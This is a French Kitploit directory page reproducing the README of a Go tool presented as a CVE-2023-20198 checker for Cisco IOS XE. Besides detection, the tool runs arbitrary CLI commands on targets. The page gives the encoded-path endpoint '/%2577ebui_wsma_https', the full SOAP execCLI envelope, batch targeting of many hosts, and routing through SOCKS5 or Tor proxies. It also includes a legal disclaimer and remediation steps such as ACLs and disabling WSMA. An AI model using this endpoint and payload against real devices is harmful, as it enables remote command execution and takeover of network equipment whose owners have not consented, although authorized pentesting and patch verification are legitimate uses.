Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
cisco-cve-2023-20198-checker — Scanneur de vulnérabilités basé sur Go pour la détection de CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML (WSMA) pour l'exécution de code à distance avec analyse par lots et génération de rapports HTML. | Kitploit
Outils/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Scanners de VulnérabilitésExploitationExploitation d'Applications WebSécurité RéseauTests d'IntrusionCommandement et Contrôle
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Scanneur de vulnérabilités basé sur Go pour la détection de CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML (WSMA) pour l'exécution de code à distance avec analyse par lots et génération de rapports HTML.

Voir le dépôt
9il y a 6 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Cisco CVE-2023-20198 Vérificateur

Go Version License Platform

Un scanner de vulnérabilités professionnel pour détecter CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML vulnérables (WSMA). Conçu pour les évaluations de sécurité autorisées et l'audit réseau.

⚠️ Avertissement légal

POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT

Cet outil est destiné exclusivement à :

  • L'analyse de vulnérabilités autorisée
  • Les audits de sécurité avec consentement écrit explicite
  • Les évaluations de sécurité réseau
  • Des fins éducatives dans des environnements de laboratoire contrôlés
  • Les tests de conformité et de pénétration

L'accès non autorisé aux systèmes informatiques est ILLÉGAL. Assurez-vous toujours d'avoir l'autorisation appropriée avant de tester tout système.


🚀 Démarrage rapide

Installation

Avec go install (Recommandé)

go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

Le binaire sera installé dans votre répertoire $GOPATH/bin (généralement ~/go/bin).

Installation manuelle

# Cloner le dépôt
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Compiler
go build -o cisco-cve-2023-20198-checker

# Installer (optionnel)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Utilisation de base

# Vérifier une seule cible
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Vérifier plusieurs cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# Générer un rapport HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Fonctionnalités

  • ✅ Détection de vulnérabilités - Teste CVE-2023-20198 (WSMA RCE)
  • ✅ Analyse cible unique et par lot
  • ✅ Prise en charge des ports personnalisés (défaut : 443)
  • ✅ Exécution de commandes via SOAP/XML
  • ✅ Génération de rapports HTML professionnels
  • ✅ Zéro dépendance externe
  • ✅ Multi-plateforme (Linux, macOS, Windows)
  • ✅ Option d'ignorer les certificats SSL/TLS
  • ✅ Délais d'attente configurables
  • ✅ Prise en charge des proxys (HTTP, HTTPS, SOCKS5)
  • ✅ Proxys authentifiés
  • ✅ Prise en charge des variables d'environnement (HTTP_PROXY, HTTPS_PROXY)

🌐 Prise en charge des proxys

Parfait pour les environnements d'entreprise ! Prend en charge :

  • Proxys HTTP/HTTPS
  • Proxys SOCKS5 (tunnels SSH, Tor)
  • Proxys authentifiés
  • Variables d'environnement
# Proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Variable d'environnement
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Voir PROXY_GUIDE.md pour une configuration détaillée des proxys.


💻 Options de ligne de commande

OptionTypeDéfautDescription
-targetstring-IP/nom d'hôte de la cible unique
-targets-filestring-Fichier contenant les cibles (une par ligne)
-portint443Port HTTPS/SOAP
-usernamestringadminNom d'utilisateur SOAP
-passwordstring-Requis. Mot de passe SOAP
-commandstringuname -aCommande à exécuter
-htmlboolfalseGénérer un rapport HTML
-timeoutint10Délai d'attente de la requête (secondes)
-skip-verifybooltrueIgnorer la vérification SSL
-proxystring-URL du proxy (http://, https://, socks5://)

📖 Exemples d'utilisation

Test d'une cible unique

# Vérification de vulnérabilité de base
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Port personnalisé
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Exécuter une commande spécifique
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Générer un rapport
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Tests par lot

# Créer un fichier de cibles
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Tester toutes les cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Lot avec rapport HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Commandes avancées

# Énumération réseau
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Détection de version
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Via proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Via proxy SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Proxy authentifié
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 À propos de CVE-2023-20198

Détails de la vulnérabilité

Identifiant CVE : CVE-2023-20198
Score CVSS : 10.0 (Critique)
Type : Exécution de code à distance (RCE)
Affecté : Interface Web Cisco IOS XE (WSMA)

Détails techniques

  • Point d'accès : /%2577ebui_wsma_https (contournement d'encodage de chemin)
  • Protocole : SOAP 1.1 sur HTTPS
  • Authentification : WS-Security UsernameToken (informations d'identification valides requises)
  • Espace de noms : urn:cisco:wsma-exec
  • Impact : Compromission totale de l'appareil avec des identifiants valides

Structure de la requête SOAP

<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Remédiation

Pour les administrateurs système

Si vos appareils sont vulnérables :

1. Désactiver WSMA (si non requis)

no ip http server
no ip http secure-server

2. Restreindre l'accès avec des ACL

ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Mettre à jour le firmware - Appliquer les derniers correctifs de sécurité Cisco

4. Activer une authentification forte

aaa new-model
aaa authentication login default group tacacs+ local

5. Surveiller les journaux - Rechercher toute activité SOAP/HTTP suspecte


🏗️ Compilation depuis les sources

Prérequis

  • Go 1.21 ou version ultérieure

Compilation

# Compilation standard
go build -o cisco-cve-2023-20198-checker

# Optimisé (binaire plus petit)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
Télécharger l’outil